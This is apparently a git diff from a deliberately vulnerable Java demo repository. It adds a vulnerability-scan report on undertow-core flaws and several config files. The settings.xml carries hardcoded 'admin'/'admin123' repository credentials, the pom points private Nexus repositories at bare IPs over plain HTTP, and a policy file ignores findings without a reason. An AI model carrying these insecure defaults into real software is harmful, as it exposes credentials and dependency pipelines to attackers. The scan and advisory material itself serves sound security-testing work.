+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/settings.xml b/log4shell-goof/log4shell-server/settings.xml
new file mode 100644
index 0000000000..7e4e710df2
--- /dev/null
+++ b/log4shell-goof/log4shell-server/settings.xml
@@ -0,0 +1,13 @@
+
+
+
+ privatedeps
+ admin
+ admin123
+
+
+
+
\ No newline at end of file
diff --git a/testDOcker b/testDOcker
new file mode 100644
index 0000000000..64205d7d4d
--- /dev/null
+++ b/testDOcker
@@ -0,0 +1,6 @@
+FROM debian:11-slim
+
+From python@sha256:603879aeff06df23f0d392a19f7ce02aa85e14e6b4d25fd9647b116e0cb93467
+
+RUN apt-get update
+RUN apt install linux-libc-dev
diff --git a/todolist-goof/pom.xml b/todolist-goof/test-pom.xml
similarity index 100%
rename from todolist-goof/pom.xml
rename to todolist-goof/test-pom.xml
diff --git a/todolist-goof/todolist-core/.snyk b/todolist-goof/todolist-core/.snyk
new file mode 100644
index 0000000000..53762a6404
--- /dev/null
+++ b/todolist-goof/todolist-core/.snyk
@@ -0,0 +1,19 @@
+# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.
+version: v1.25.1
+# ignores vulnerabilities until expiry date; change duration by modifying expiry date
+ignore:
+ 'snyk:lic:pip:certifi:MPL-2.0':
+ - '*':
+ reason: None given
+ expires: '2026-06-19T20:36:54.553Z'
+ 'io.github.snyk:todolist-core@0.0.1-SNAPSHOT':
+ - '*':
+ reason: None Given
+ expires: 2025-02-07T16:10:18.094Z
+ created: 2025-01-08T16:10:18.099Z
+ 'snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0':
+ - '*':
+ reason: None Given
+ expires: 2025-02-07T16:11:01.062Z
+ created: 2025-01-08T16:11:01.065Z
+patch: {}
diff --git a/todolist-goof/todolist-core/pom.xml b/todolist-goof/todolist-core/pom.xml
index cd5bc869f1..ac0c454ccc 100644
--- a/todolist-goof/todolist-core/pom.xml
+++ b/todolist-goof/todolist-core/pom.xml
@@ -13,12 +13,12 @@
privatedeps
snapshots
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://35.171.191.69:8081/nexus/content/repositories/snapshots
privatedeps
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://35.171.191.69:8081/nexus/content/repositories/releases
@@ -47,7 +47,7 @@
org.springframework
spring-aspects
${spring.version}
-
+